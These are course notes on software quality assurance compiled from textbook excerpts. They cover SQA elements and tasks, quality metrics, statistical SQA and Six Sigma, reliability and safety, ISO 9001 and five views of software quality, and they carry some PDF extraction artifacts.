CP 7026 - Software Quality Assurance

pre75977_ch16.qxd 11/27/08 6:07 PM Page 432

SOFTWARE QUALITY ASSURANCE

Definition :

Software quality assurance is: 1. A planned and systematic pattern of all actions necessary to provide adequate confidence that an item or product conforms to established technical requirements.

2. A set of activities designed to evaluate the process by which the products are developed or manufactured. Contrast with: quality control.

3. A systematic, planned set of actions necessary to provide adequate confidence that the software development process or the maintenance process of a software system product conforms to established functional technical requirements as well as with the managerial requirements of keeping the schedule and operating within the budgetary confines.

objectives of SQA

(1) Assuring an acceptable level of confidence that the software will conform to functional technical requirements.(2) Assuring an acceptable level of confidence that the software will conform to managerial scheduling and budgetary requirements.(3) Initiation and management of activities for the improvement and greater efficiency of software development and SQA activities.

ELEMENTS OF SOFTWARE QUALITY ASSURANCE

Software quality assurance encompasses a broad range of concerns and activities

that focus on the management of software quality. These can be summarized in the

following manner [Hor03]:

Standards. The IEEE, ISO, and other standards organizations have pro-

duced a broad array of software engineering standards and related docu-

ments. Standards may be adopted voluntarily by a software engineering

organization or imposed by the customer or other stakeholders. The job of

SQA is to ensure that standards that have been adopted are followed and

that all work products conform to them.

Reviews and audits. Technical reviews are a quality control activity

performed by software engineers for software engineers (Chapter 15).

Their intent is to uncover errors. Audits are a type of review performed by

SQA personnel with the intent of ensuring that quality guidelines are being

followed for software engineering work. For example, an audit of the

review process might be conducted to ensure that reviews are being

performed in a manner that will lead to the highest likelihood of

uncovering errors.

Testing. Software testing (Chapters 17 through 20) is a quality control func-

tion that has one primary goal—to find errors. The job of SQA is to ensure

that testing is properly planned and efficiently conducted so that it has the

highest likelihood of achieving its primary goal.

Error/defect collection and analysis. The only way to improve is to

measure how you’re doing. SQA collects and analyzes error and defect data

to better understand how errors are introduced and what software engineer-

ing activities are best suited to eliminating them.

Change management. Change is one of the most disruptive aspects of

any software project. If it is not properly managed, change can lead to con-

fusion, and confusion almost always leads to poor quality. SQA ensures that

adequate change management practices (Chapter 22) have been instituted.

WebRefAn in-depth discussionof SQA, includinga wide array ofdefinitions, canbe obtained atwww.swqual.com/newsletter/vol2/no1/vol2no1.html.

pre75977_ch16.qxd 11/27/08 6:07 PM Page 434

UNIT I - INTRODUCTION

Introduction

http://www.swqual

Education. Every software organization wants to improve its software

engineering practices. A key contributor to improvement is education of soft-

ware engineers, their managers, and other stakeholders. The SQA organiza-

tion takes the lead in software process improvement (Chapter 30) and is a

key proponent and sponsor of educational programs.

Vendor management. Three categories of software are acquired from

external software vendors—shrink-wrapped packages (e.g., Microsoft Office),

a tailored shell [Hor03] that provides a basic skeletal structure that is custom

tailored to the needs of a purchaser, and contracted software that is custom

designed and constructed from specifications provided by the customer

organization. The job of the SQA organization is to ensure that high-quality

software results by suggesting specific quality practices that the vendor

should follow (when possible), and incorporating quality mandates as part of

any contract with an external vendor.

Security management. With the increase in cyber crime and new govern-

ment regulations regarding privacy, every software organization should insti-

tute policies that protect data at all levels, establish firewall protection for

WebApps, and ensure that software has not been tampered with internally.

SQA ensures that appropriate process and technology are used to achieve

software security.

Safety. Because software is almost always a pivotal component of human-

rated systems (e.g., automotive or aircraft applications), the impact of hidden

defects can be catastrophic. SQA may be responsible for assessing the impact

of software failure and for initiating those steps required to reduce risk.

Risk management. Although the analysis and mitigation of risk (Chapter

28) is the concern of software engineers, the SQA organization ensures that

risk management activities are properly conducted and that risk-related

contingency plans have been established.

In addition to each of these concerns and activities, SQA works to ensure that soft-

ware support activities (e.g., maintenance, help lines, documentation, and manuals)

are conducted or produced with quality as a dominant concern.

CHAPTER 16 SOFTWARE QUALITY ASSURANCE 435

uote:

“Excellence is theunlimited ability toimprove the qualityof what you haveto offer.”

Rick Petin

pre75977_ch16.qxd 11/27/08 6:07 PM Page 435

http://www.asq.org/software

http://www.acm.org

http://www.dacs.dtic.mil/

http://www.iso.ch

http://www.isospice.com

SQA TASKS , GOALS , AND METRICS

Software quality assurance is composed of a variety of tasks associated with two dif-

ferent constituencies—the software engineers who do technical work and an SQA

group that has responsibility for quality assurance planning, oversight, record keep-

ing, analysis, and reporting.

Software engineers address quality (and perform quality control activities) by

applying solid technical methods and measures, conducting technical reviews, and

performing well-planned software testing.

1 SQA Tasks

The charter of the SQA group is to assist the software team in achieving a high-

quality end product. The Software Engineering Institute recommends a set of SQA

actions that address quality assurance planning, oversight, record keeping, analysis,

and reporting. These actions are performed (or facilitated) by an independent SQA

group that:

Prepares an SQA plan for a project. The plan is developed as part of

project planning and is reviewed by all stakeholders. Quality assurance

actions performed by the software engineering team and the SQA group are

governed by the plan. The plan identifies evaluations to be performed,

audits and reviews to be conducted, standards that are applicable to the

project, procedures for error reporting and tracking, work products that

are produced by the SQA group, and feedback that will be provided to the

software team.

Participates in the development of the project’s software process

description. The software team selects a process for the work to be

performed. The SQA group reviews the process description for compli-

ance with organizational policy, internal software standards, externally

imposed standards (e.g., ISO-9001), and other parts of the software

project plan.

What is therole of an

SQA group??

pre75977_ch16.qxd 11/27/08 6:07 PM 36

http://www.quality.nist.gov

http://www.sei.cmu.edu/

http://www.stickyminds.com

http://www.isixsigma.com/

http://www.asq.org/sixsigma/

http://www.tickit.org/international.htm

http://www.gslis.utexas.edu/~rpollock/tqm.html

http://www.work911.com/tqmarticles.htm

http://www.quality.org/TQM-MSI/TQM-glossary

Reviews software engineering activities to verify compliance with the

defined software process. The SQA group identifies, documents, and tracks

deviations from the process and verifies that corrections have been made.

Audits designated software work products to verify compliance with

those defined as part of the software process. The SQA group reviews

selected work products; identifies, documents, and tracks deviations; verifies

that corrections have been made; and periodically reports the results of its

work to the project manager.

Ensures that deviations in software work and work products are

documented and handled according to a documented procedure.

Deviations may be encountered in the project plan, process description,

applicable standards, or software engineering work products.

Records any noncompliance and reports to senior management.

Noncompliance items are tracked until they are resolved.

In addition to these actions, the SQA group coordinates the control and management

of change (Chapter 22) and helps to collect and analyze software metrics.

2 Goals, Attributes, and Metrics

The SQA actions described in the preceding section are performed to achieve a set

of pragmatic goals:

Requirements quality. The correctness, completeness, and consistency

of the requirements model will have a strong influence on the quality of all

work products that follow. SQA must ensure that the software team has

properly reviewed the requirements model to achieve a high level of quality.

Design quality. Every element of the design model should be assessed by

the software team to ensure that it exhibits high quality and that the design

itself conforms to requirements. SQA looks for attributes of the design that

are indicators of quality.

Code quality. Source code and related work products (e.g., other descrip-

tive information) must conform to local coding standards and exhibit charac-

teristics that will facilitate maintainability. SQA should isolate those attributes

that allow a reasonable analysis of the quality of code.

Quality control effectiveness. A software team should apply limited re-

sources in a way that has the highest likelihood of achieving a high-quality

result. SQA analyzes the allocation of resources for reviews and testing to

assess whether they are being allocated in the most effective manner.

Figure 16.1 (adapted from [Hya96]) identifies the attributes that are indicators for

the existence of quality for each of the goals discussed. Metrics that can be used to

indicate the relative strength of an attribute are also shown.


uote:

“Quality is neveran accident; it isalways the result ofhigh intention,sincere effort,intelligent directionand skillfulexecution; itrepresents the wisechoice of manyalternatives.”

William A.Foster

pre75977_ch16.qxd 11/27/08 6:07 PM Page 437

438 PART THREE QUALITY MANAGEMENT

FIGURE 16.1

Goal Attribute Metric

Requirement quality Ambiguity Number of ambiguous modifiers (e.g., many, large,human-friendly)

Completeness Number of TBA, TBD

Understandability Number of sections/subsections

Volatility Number of changes per requirement

Time (by activity) when change is requested

Traceability Number of requirements not traceable to design/code

Model clarity Number of UML models

Number of descriptive pages per model

Number of UML errors

Design quality Architectural integrity Existence of architectural model

Component completeness Number of components that trace to architectural model

Complexity of procedural design

Interface complexity Average number of pick to get to a typical function or content

Layout appropriateness

Patterns Number of patterns used

Code quality Complexity Cyclomatic complexity

Maintainability Design factors (Chapter 8)

Understandability Percent internal comments

Variable naming conventions

Reusability Percent reused components

Documentation Readability index

QC effectiveness Resource allocation Staff hour percentage per activity

Completion rate Actual vs. budgeted completion time

Review effectiveness See review metrics (Chapter 14)

Testing effectiveness Number of errors found and criticality

Effort required to correct an error

Origin of error

Software quality goals, attributes, and metricsSource: Adapted from [Hya96].

16.4 FORMAL APPROACHES TO SQA

In the preceding sections, I have argued that software quality is everyone’s job and

that it can be achieved through competent software engineering practice as well as

through the application of technical reviews, a multi-tiered testing strategy, better

control of software work products and the changes made to them, and the applica-

tion of accepted software engineering standards. In addition, quality can be defined

pre75977_ch16.qxd 11/27/08 6:07 PM Page 438

in terms of a broad array of quality attributes and measured (indirectly) using a

variety of indices and metrics.

Over the past three decades, a small, but vocal, segment of the software engineer-

ing community has argued that a more formal approach to software quality assurance

is required. It can be argued that a computer program is a mathematical object. A rig-

orous syntax and semantics can be defined for every programming language, and a

rigorous approach to the specification of software requirements (Chapter 21) is avail-

able. If the requirements model (specification) and the programming language can be

represented in a rigorous manner, it should be possible to apply mathematic proof of

correctness to demonstrate that a program conforms exactly to its specifications.

Attempts to prove programs correct are not new. Dijkstra [Dij76a] and Linger,

Mills, and Witt [Lin79], among others, advocated proofs of program correctness and

tied these to the use of structured programming concepts (Chapter 10).

16.5 STATISTICAL SOFTWARE QUALITY ASSURANCE

Statistical quality assurance reflects a growing trend throughout industry to become

more quantitative about quality. For software, statistical quality assurance implies

the following steps:

1. Information about software errors and defects is collected and categorized.

2. An attempt is made to trace each error and defect to its underlying cause

(e.g., nonconformance to specifications, design error, violation of standards,

poor communication with the customer).

3. Using the Pareto principle (80 percent of the defects can be traced to 20 per-

cent of all possible causes), isolate the 20 percent (the vital few).

4. Once the vital few causes have been identified, move to correct the problems

that have caused the errors and defects.

This relatively simple concept represents an important step toward the creation of

an adaptive software process in which changes are made to improve those elements

of the process that introduce error.

16.5.1 A Generic Example

To illustrate the use of statistical methods for software engineering work, assume

that a software engineering organization collects information on errors and defects

for a period of one year. Some of the errors are uncovered as software is being de-

veloped. Others (defects) are encountered after the software has been released to its

end users. Although hundreds of different problems are uncovered, all can be

tracked to one (or more) of the following causes:

• Incomplete or erroneous specifications (IES)

• Misinterpretation of customer communication (MCC)


WebRefUseful information onSQA and formal qualitymethods can be foundat www.gslis.utexas.edu/~rpollock/tqm.html.

What stepsare required

to performstatistical SQA?

?

uote:

“A statisticalanalysis, properlyconducted, is adelicate dissectionof uncertainties,a surgery ofsuppositions.”

M. J. Moroney

pre75977_ch16.qxd 11/27/08 6:07 PM Page 439

http://www.gslis

• Intentional deviation from specifications (IDS)

• Violation of programming standards (VPS)

• Error in data representation (EDR)

• Inconsistent component interface (ICI)

• Error in design logic (EDL)

• Incomplete or erroneous testing (IET)

• Inaccurate or incomplete documentation (IID)

• Error in programming language translation of design (PLT)

• Ambiguous or inconsistent human/computer interface (HCI)

• Miscellaneous (MIS)

To apply statistical SQA, the table in Figure 16.2 is built. The table indicates that IES,

MCC, and EDR are the vital few causes that account for 53 percent of all errors. It

should be noted, however, that IES, EDR, PLT, and EDL would be selected as the vital

few causes if only serious errors are considered. Once the vital few causes are

determined, the software engineering organization can begin corrective action. For

example, to correct MCC, you might implement requirements gathering techniques

(Chapter 5) to improve the quality of customer communication and specifications. To

improve EDR, you might acquire tools for data modeling and perform more stringent

data design reviews.

It is important to note that corrective action focuses primarily on the vital few. As

the vital few causes are corrected, new candidates pop to the top of the stack.

Statistical quality assurance techniques for software have been shown to provide

substantial quality improvement [Art97]. In some cases, software organizations


Total Serious Moderate Minor

Error No. % No. % No. % No. %

IES 205 22% 34 27% 68 18% 103 24%

MCC 156 17% 12 9% 68 18% 76 17%

IDS 48 5% 1 1% 24 6% 23 5%

VPS 25 3% 0 0% 15 4% 10 2%

EDR 130 14% 26 20% 68 18% 36 8%

ICI 58 6% 9 7% 18 5% 31 7%

EDL 45 5% 14 11% 12 3% 19 4%

IET 95 10% 12 9% 35 9% 48 11%

IID 36 4% 2 2% 20 5% 14 3%

PLT 60 6% 15 12% 19 5% 26 6%

HCI 28 3% 3 2% 17 4% 8 2%

MIS 56 6% 0 0% 15 4% 41 9%

Totals 942 100% 128 100% 379 100% 435 100%

FIGURE 16.2

Data collectionfor statisticalSQA

uote:

“20 percent of thecode has 80percent of theerrors. Find them,fix them!”

Lowell Arthur

pre75977_ch16.qxd 11/27/08 6:07 PM Page 440

have achieved a 50 percent reduction per year in defects after applying these

techniques.

The application of the statistical SQA and the Pareto principle can be summarized

in a single sentence: Spend your time focusing on things that really matter, but first be

sure that you understand what really matters!

16.5.2 Six Sigma for Software Engineering

Six Sigma is the most widely used strategy for statistical quality assurance in indus-

try today. Originally popularized by Motorola in the 1980s, the Six Sigma strategy

“is a rigorous and disciplined methodology that uses data and statistical analysis to

measure and improve a company’s operational performance by identifying and elim-

inating defects’ in manufacturing and service-related processes” [ISI08]. The term

Six Sigma is derived from six standard deviations—3.4 instances (defects) per million

occurrences—implying an extremely high quality standard. The Six Sigma method-

ology defines three core steps:

• Define customer requirements and deliverables and project goals via well-

defined methods of customer communication.

• Measure the existing process and its output to determine current quality

performance (collect defect metrics).

• Analyze defect metrics and determine the vital few causes.

If an existing software process is in place, but improvement is required, Six Sigma

suggests two additional steps:

• Improve the process by eliminating the root causes of defects.

• Control the process to ensure that future work does not reintroduce the

causes of defects.

These core and additional steps are sometimes referred to as the DMAIC (define,

measure, analyze, improve, and control) method.

If an organization is developing a software process (rather than improving an

existing process), the core steps are augmented as follows:

• Design the process to (1) avoid the root causes of defects and (2) to meet

customer requirements.

• Verify that the process model will, in fact, avoid defects and meet customer

requirements.

This variation is sometimes called the DMADV (define, measure, analyze, design,

and verify) method.

A comprehensive discussion of Six Sigma is best left to resources dedicated to the

subject. If you have further interest, see [ISI08], [Pyz03], and [Sne03].


What are thecore steps of

the Six Sigmamethodology?

?

pre75977_ch16.qxd 11/27/08 6:07 PM Page 441

16.6 SOFTWARE RELIABIL ITY

There is no doubt that the reliability of a computer program is an important element

of its overall quality. If a program repeatedly and frequently fails to perform, it mat-

ters little whether other software quality factors are acceptable.

Software reliability, unlike many other quality factors, can be measured directly

and estimated using historical and developmental data. Software reliability is defined

in statistical terms as “the probability of failure-free operation of a computer program

in a specified environment for a specified time” [Mus87]. To illustrate, program X is

estimated to have a reliability of 0.999 over eight elapsed processing hours. In other

words, if program X were to be executed 1000 times and require a total of eight hours

of elapsed processing time (execution time), it is likely to operate correctly (without

failure) 999 times.

Whenever software reliability is discussed, a pivotal question arises: What is meant

by the term failure? In the context of any discussion of software quality and reliabil-

ity, failure is nonconformance to software requirements. Yet, even within this defini-

tion, there are gradations. Failures can be only annoying or catastrophic. One failure

can be corrected within seconds, while another requires weeks or even months to

correct. Complicating the issue even further, the correction of one failure may in fact

result in the introduction of other errors that ultimately result in other failures.

16.6.1 Measures of Reliability and Availability

Early work in software reliability attempted to extrapolate the mathematics of hard-

ware reliability theory to the prediction of software reliability. Most hardware-related

reliability models are predicated on failure due to wear rather than failure due to de-

sign defects. In hardware, failures due to physical wear (e.g., the effects of tempera-

ture, corrosion, shock) are more likely than a design-related failure. Unfortunately,

the opposite is true for software. In fact, all software failures can be traced to design

or implementation problems; wear (see Chapter 1) does not enter into the picture.

There has been an ongoing debate over the relationship between key concepts in

hardware reliability and their applicability to software. Although an irrefutable link

has yet to be established, it is worthwhile to consider a few simple concepts that

apply to both system elements.

If we consider a computer-based system, a simple measure of reliability is mean-

time-between-failure (MTBF):

MTBF � MTTF � MTTR

where the acronyms MTTF and MTTR are mean-time-to-failure and mean-time-to-

repair,2 respectively.


uote:

“The unavoidableprice of reliabilityis simplicity.”

C. A. R. Hoare

Software reliabilityproblems can almostalways be tracedto defects in design orimplementation.

2 Although debugging (and related corrections) may be required as a consequence of failure, in manycases the software will work properly after a restart with no other change.

It is important to notethat MTBF and relatedmeasures are based onCPU time, not wallclock time.

pre75977_ch16.qxd 11/27/08 6:07 PM Page 442

Many researchers argue that MTBF is a far more useful measure than other

quality-related software metrics discussed in Chapter 23. Stated simply, an end user

is concerned with failures, not with the total defect count. Because each defect con-

tained within a program does not have the same failure rate, the total defect count

provides little indication of the reliability of a system. For example, consider a pro-

gram that has been in operation for 3000 processor hours without failure. Many de-

fects in this program may remain undetected for tens of thousand of hours before

they are discovered. The MTBF of such obscure errors might be 30,000 or even

60,000 processor hours. Other defects, as yet undiscovered, might have a failure rate

of 4000 or 5000 hours. Even if every one of the first category of errors (those with

long MTBF) is removed, the impact on software reliability is negligible.

However, MTBF can be problematic for two reasons: (1) it projects a time span be-

tween failures, but does not provide us with a projected failure rate, and (2) MTBF can

be misinterpreted to mean average life span even though this is not what it implies.

An alternative measure of reliability is failures-in-time (FIT)—a statistical measure

of how many failures a component will have over one billion hours of operation.

Therefore, 1 FIT is equivalent to one failure in every billion hours of operation.

In addition to a reliability measure, you should also develop a measure of avail-

ability. Software availability is the probability that a program is operating according to

requirements at a given point in time and is defined as

Availability � � 100%

The MTBF reliability measure is equally sensitive to MTTF and MTTR. The avail-

ability measure is somewhat more sensitive to MTTR, an indirect measure of the

maintainability of software.

16.6.2 Software Safety

Software safety is a software quality assurance activity that focuses on the identification

and assessment of potential hazards that may affect software negatively and cause an

entire system to fail. If hazards can be identified early in the software process, software

design features can be specified that will either eliminate or control potential hazards.

A modeling and analysis process is conducted as part of software safety. Initially,

hazards are identified and categorized by criticality and risk. For example, some of

the hazards associated with a computer-based cruise control for an automobile

might be: (1) causes uncontrolled acceleration that cannot be stopped, (2) does not

respond to depression of brake pedal (by turning off), (3) does not engage when

switch is activated, and (4) slowly loses or gains speed. Once these system-level haz-

ards are identified, analysis techniques are used to assign severity and probability of

occurrence.3 To be effective, software must be analyzed in the context of the entire

MTTFMTTF � MTTR


Some aspects ofavailability (notdiscussed here) havenothing to do withfailure. For example,scheduling downtime(for support functions)causes the software tobe unavailable.

uote:

“The safety of thepeople shall be thehighest law.”

Cicero

3 This approach is similar to the risk analysis methods described in Chapter 28. The primary differ-ence is the emphasis on technology issues rather than project-related topics.

pre75977_ch16.qxd 11/27/08 6:07 PM Page 443

system. For example, a subtle user input error (people are system components) may

be magnified by a software fault to produce control data that improperly positions a

mechanical device. If and only if a set of external environmental conditions is met,

the improper position of the mechanical device will cause a disastrous failure. Analy-

sis techniques [Eri05] such as fault tree analysis, real-time logic, and Petri net mod-

els can be used to predict the chain of events that can cause hazards and the

probability that each of the events will occur to create the chain.

Once hazards are identified and analyzed, safety-related requirements can be

specified for the software. That is, the specification can contain a list of undesirable

events and the desired system responses to these events. The role of software in

managing undesirable events is then indicated.

Although software reliability and software safety are closely related to one another,

it is important to understand the subtle difference between them. Software reliability

uses statistical analysis to determine the likelihood that a software failure will occur.

However, the occurrence of a failure does not necessarily result in a hazard or mishap.

Software safety examines the ways in which failures result in conditions that can lead

to a mishap. That is, failures are not considered in a vacuum, but are evaluated in the

context of an entire computer-based system and its environment.

A comprehensive discussion of software safety is beyond the scope of this book.

If you have further interest in software safety and related system issues, see [Smi05],

[Dun02], and [Lev95].

THE ISO 9000 QUALITY STANDARDS4

A quality assurance system may be defined as the organizational structure, responsi-

bilities, procedures, processes, and resources for implementing quality management

[ANS87]. Quality assurance systems are created to help organizations ensure their

products and services satisfy customer expectations by meeting their specifications.

These systems cover a wide variety of activities encompassing a product’s entire life

cycle including planning, controlling, measuring, testing and reporting, and improv-

ing quality levels throughout the development and manufacturing process. ISO 9000

describes quality assurance elements in generic terms that can be applied to any

business regardless of the products or services offered.

To become registered to one of the quality assurance system models contained in ISO

9000, a company’s quality system and operations are scrutinized by third-party auditors

for compliance to the standard and for effective operation. Upon successful registration,

a company is issued a certificate from a registration body represented by the auditors.

Semiannual surveillance audits ensure continued compliance to the standard.


uote:

“I cannot imagineany conditionwhich wouldcause this ship tofounder. Modernshipbuilding hasgone beyond that.”

E. I. Smith,captain of theTitanic

WebRefA worthwhile collectionof papers on softwaresafety can be found atwww.safeware-eng.com/.

4 This section, written by Michael Stovsky, has been adapted from “Fundamentals of ISO 9000,”a workbook developed for Essential Software Engineering, a video curriculum developed by R. S.Pressman & Associates, Inc. Reprinted with permission.

pre75977_ch16.qxd 11/27/08 6:07 PM Page 444

http://www.safeware-eng.com/



The requirements delineated by ISO 9001:2000 address topics such as manage-

ment responsibility, quality system, contract review, design control, document and

data control, product identification and traceability, process control, inspection and

testing, corrective and preventive action, control of quality records, internal quality

audits, training, servicing, and statistical techniques. In order for a software organi-

zation to become registered to ISO 9001:2000, it must establish policies and proce-

dures to address each of the requirements just noted (and others) and then be able

to demonstrate that these policies and procedures are being followed. If you desire

further information on ISO 9001:2000, see [Ant06], [Mut03], or [Dob04].


WebRefExtensive links to ISO9000/9001 resourcescan be found atwww.tantara.ab.ca/info.htm.

The ISO 9001:2000 StandardThe following outline defines the basicelements of the ISO 9001:2000 standard.

Comprehensive information on the standard can beobtained from the International Organization forStandardization (www.iso.ch) and other Internetsources (e.g., www.praxiom.com).

Establish the elements of a quality management system.Develop, implement, and improve the system.Define a policy that emphasizes the importance of thesystem.

Document the quality system.Describe the process.Produce an operational manual.Develop methods for controlling (updating) documents.Establish methods for record keeping.

Support quality control and assurance.Promote the importance of quality among all stakeholders.Focus on customer satisfaction.

Define a quality plan that addresses objectives,responsibilities, and authority.

Define communication mechanisms among stakeholders.Establish review mechanisms for the quality management

system.Identify review methods and feedback mechanisms.Define follow-up procedures.

Identify quality resources including personnel, training,and infrastructure elements.

Establish control mechanisms.For planningFor customer requirementsFor technical activities (e.g., analysis, design, testing)For project monitoring and management

Define methods for remediation.Assess quality data and metrics.Define approach for continuous process and qualityimprovement.

INFO

THE SQA PLAN

The SQA Plan provides a road map for instituting software quality assurance. Developed

by the SQA group (or by the software team if an SQA group does not exist), the plan

serves as a template for SQA activities that are instituted for each software project.

A standard for SQA plans has been published by the IEEE [IEE93]. The standard

recommends a structure that identifies: (1) the purpose and scope of the plan, (2) a

description of all software engineering work products (e.g., models, documents,

source code) that fall within the purview of SQA, (3) all applicable standards and

practices that are applied during the software process, (4) SQA actions and tasks

pre75977_ch16.qxd 11/27/08 6:07 PM Page 445

http://www.tantara.ab

http://www.iso.ch

http://www.praxiom.com

http://www.praxiom.com

(including reviews and audits) and their placement throughout the software

process, (5) the tools and methods that support SQA actions and tasks, (6) software

configuration management (Chapter 22) procedures, (7) methods for assembling,

safeguarding, and maintaining all SQA-related records, and (8) organizational roles

and responsibilities relative to product quality.


Software Quality Management

Objective: The objective of SQA tools is toassist a project team in assessing and

improving the quality of software work product.

Mechanics: Tools mechanics vary. In general, the intentis to assess the quality of a specific work product. Note:A wide array of software testing tools (see Chapters 17through 20) are often included within the SQA toolscategory.

Representative Tools:5

ARM, developed by NASA (satc.gsfc.nasa.gov/tools/index.html), provides measures that can be

used to assess the quality of a software requirementsdocument.

QPR ProcessGuide and Scorecard, developed by QPRSoftware (www.qpronline.com), provides supportfor Six Sigma and other quality managementapproaches.

Quality Tools and Templates, developed by iSixSigma(www.isixsigma.com/tt/), describes a wide arrayof useful tools and methods for quality management.

NASA Quality Resources, developed by the GoddardSpace Flight Center (sw-assurance.gsfc.nasa.gov/index.php) provides useful forms, templates,checklists, and tools for SQA.

SOFTWARE TOOLS

SUMMARY

Software quality assurance is a software engineering umbrella activity that is applied

at each step in the software process. SQA encompasses procedures for the effective

application of methods and tools, oversight of quality control activities such as tech-

nical reviews and software testing, procedures for change management, procedures

for assuring compliance to standards, and measurement and reporting mechanisms.

To properly conduct software quality assurance, data about the software engi-

neering process should be collected, evaluated, and disseminated. Statistical SQA

helps to improve the quality of the product and the software process itself. Software

reliability models extend measurements, enabling collected defect data to be ex-

trapolated into projected failure rates and reliability predictions.

In summary, you should note the words of Dunn and Ullman [Dun82]: “Software

quality assurance is the mapping of the managerial precepts and design disciplines

of quality assurance onto the applicable managerial and technological space of

software engineering.” The ability to ensure quality is the measure of a mature

engineering discipline. When the mapping is successfully accomplished, mature

software engineering is the result.

pre75977_ch16.qxd 11/27/08 6:07 PM Page 446

http://www.qpronline.com

http://www.isixsigma.com/tt/

FIVE VIEWS OF SOFTWARE QUALITY

In the early days of computers, software developers mainly focused on productfunctionalities, and most of the end users were highly qualified professionals, suchas mathematicians, scientists, and engineers. Development of personal computersand advances in computer networks, the World Wide Web, and graphical user inter-face made computer software highly accessible to all kinds of users. These daysthere is widespread computerization of many processes that used to be done byhand. For example, until the late 1990s taxpayers used to file returns on paper,but these days there are numerous web-based tax filing systems. There has beenincreasing customer expectations in terms of better quality in software products,and developers are under tremendous pressure to deliver high-quality products at alower cost. Even though competing products deliver the same functionalities, it isthe lower cost products with better quality attributes that survive in the competi-tive market. Therefore, all stakeholders—users, customers, developers, testers, andmanagers—in a product must have a broad understanding of the overall conceptof software quality.

A number of factors influence the making and buying of software products.These factors are user’s needs and expectations, the manufacturer’s considerations,the inherent characteristics of a product, and the perceived value of a product. To beable to capture the quality concept, it is important to study quality from a broaderperspective. This is because the concept of quality predates software development.In a much cited paper published in the Sloan Management Review [1], Garvinhas analyzed how quality is perceived in different manners in different domains,namely, philosophy, economics, marketing, and management:

Transcendental View : In the transcendental view quality is something thatcan be recognized through experience but is not defined in some tractable

Software Testing and Quality Assurance: Theory and Practice, Edited by Kshirasagar Naik and Priyadarshi TripathyCopyright © 2008 John Wiley & Sons, Inc.

519

Views on quality

520 CHAPTER 17 SOFTWARE QUALITY

form. Quality is viewed to be something ideal, which is too complex tolend itself to be precisely defined. However, a good-quality object standsout, and it is easily recognized. Because of the philosophical nature ofthe transcendental view, no effort is made to express it using concretemeasures.

User View : The user view concerns the extent to which a product meetsuser needs and expectations. Quality is not just viewed in terms of what aproduct can deliver, but it is also influenced by the service provisions inthe sales contract. In this view, a user is concerned with whether or not aproduct is fit for use. This view is highly personalized in nature. The idea ofoperational profile, discussed in Chapter 15, plays an important role in thisview. Because of the personalized nature of the product view, a product isconsidered to be of good quality if it satisfies the needs of a large numberof customers. It is useful to identify what product attributes users considerto be important. The reader may note that the user view can encompassmany subjective elements apart from the expected functionalities central touser satisfaction. Examples of subjective elements are usability , reliability ,testability , and efficiency .

Manufacturing View : The manufacturing view has its genesis in the manu-facturing sectors, such as the automobile and electronics sectors. In thisview, quality is seen as conforming to requirements. Any deviation fromthe stated requirements is seen as reducing the quality of the product. Theconcept of process plays a key role in the manufacturing view. Productsare to be manufactured “right the first time” so that development cost andmaintenance cost are reduced. However, there is no guarantee that con-forming to process standards will lead to good products. Some criticizethis view with an argument that conformance to a process can only leadto uniformity in the products, and, therefore, it is possible to manufacturebad-quality products in a consistent manner. However, product quality canbe incrementally enhanced by continuously improving the process. Devel-opment of the capability maturity model (CMM) [2] and ISO 9001 [3] arebased on the manufacturing view.

Product View : The central hypothesis in the product view is this: If a prod-uct is manufactured with good internal properties, then it will have goodexternal qualities . The product view is attractive because it gives rise toan opportunity to explore causal relationships between internal propertiesand external qualities of a product. In this view, the current quality levelof a product indicates the presence or absence of measurable product prop-erties. The product view of quality can be assessed in an objective manner.An example of the product view of software quality is that high degree ofmodularity, which is an internal property, makes a software testable andmaintainable.

Value-Based View : The value-based view represents a merger of two inde-pendent concepts: excellence and worth . Quality is a measure of excel-lence, and value is a measure of worth. The central idea in the value-based

17.1 FIVE VIEWS OF SOFTWARE QUALITY 521

view is how much a customer is willing to pay for a certain level of qual-ity. The reality is that quality is meaningless if a product does not makeeconomic sense. Essentially, the value-based view represents a trade-offbetween cost and quality.

Measuring Quality The five viewpoints help us in understanding differentaspects of the quality concept. On the other hand, measurement allows us tohave a quantitative view of the quality concept. In the following, we explain thereasons for developing a quantitative view of a software system [4]:

• Measurement allows us to establish baselines for qualities. Developers mustknow the minimum level of quality they must deliver for a product to beacceptable.

• Organizations make continuous improvements in their processmodels—and an improvement has a cost associated with it. Organizationsneed to know how much improvement in quality is achieved at a certaincost incurred due to process improvement. This causal relationship isuseful in making management decisions concerning process improvement.Sometimes it may be worth investing more in process improvement,whereas some other time the return may not be significant.

• The present level of quality of a product needs to be evaluated so the needfor improvements can be investigated.

Measurement of User’s View The user’s view encompasses a numberof quality factors, such as functionality, reliability, and usability. It is easy tomeasure how much of the functionalities a software product delivers by designingat least one test case for each functionality. A product may require multiple testcases for the same functionality if the functionality is to be performed in differentexecution environments. Then, the ratio of the number of passed test cases to thetotal number of test cases designed to verify the functionalities is a measure of thefunctionalities delivered by the product. Among the qualities that reflect the user’sview, the concept of reliability has drawn the most attention of researchers.

In the ISO 9126 quality model, usability has been broken down into threesubcharacteristics, namely, learnability , understandability , and operability . Learn-ability can be specified as the average elapsed time for a typical user to gain acertain level of competence in using the product. Similarly, understandability canbe quantified as the average time needed by a typical user to gain a certain levelof understanding of the product. One can quantify operability in a similar man-ner. The basic idea of breaking down usability into learnability, understandability,and operability can be seen in light of Gilb’s technique [5]: The quality conceptis broken down into component parts until each can be stated in terms of directlymeasurable attributes . Gilb’s technique is a general one to be applicable to a widevariety of user-level qualities.

Measurement of Manufacturer’s View Manufacturers are interested inobtaining measures of the following two different quantities:


• Defect Count: How many defects have been detected?

• Rework Cost: How much does it cost to fix the known defects?

Defect count represents the number of all the defects that have been detected sofar. If a product is in operation, this count includes the defects detected duringdevelopment and operation. A defect count reflects the quality of work produced.Merely counting the defects is of not much use unless something can be done toimprove the development process to reduce the defect count in subsequent projects.One can analyze the defects as follows:

• For each defect identify the development phase in which it was introducedand the phase in which it was discovered. Let us assume that a large frac-tion of the defects are introduced in the requirements gathering phase, andthose are discovered during system testing. Then, we can conclude thatrequirement analysis was not adequately performed. We can also concludethat work done subsequently, such as design verification and unit testing,were not of high standard. If a large number of defects are found dur-ing system operation, one can say that system testing was not rigorouslyperformed.

• Categorize the defects based on modules. Assuming that a module is acohesive entity performing a well-defined task, by identifying the modulescontaining most of the defects we can identify where things are goingwrong. This information can be used in managing resources. For example,if a large number of defects are found in a communication module in adistributed application, more resource could be allocated to train developersin the details of the communication system.

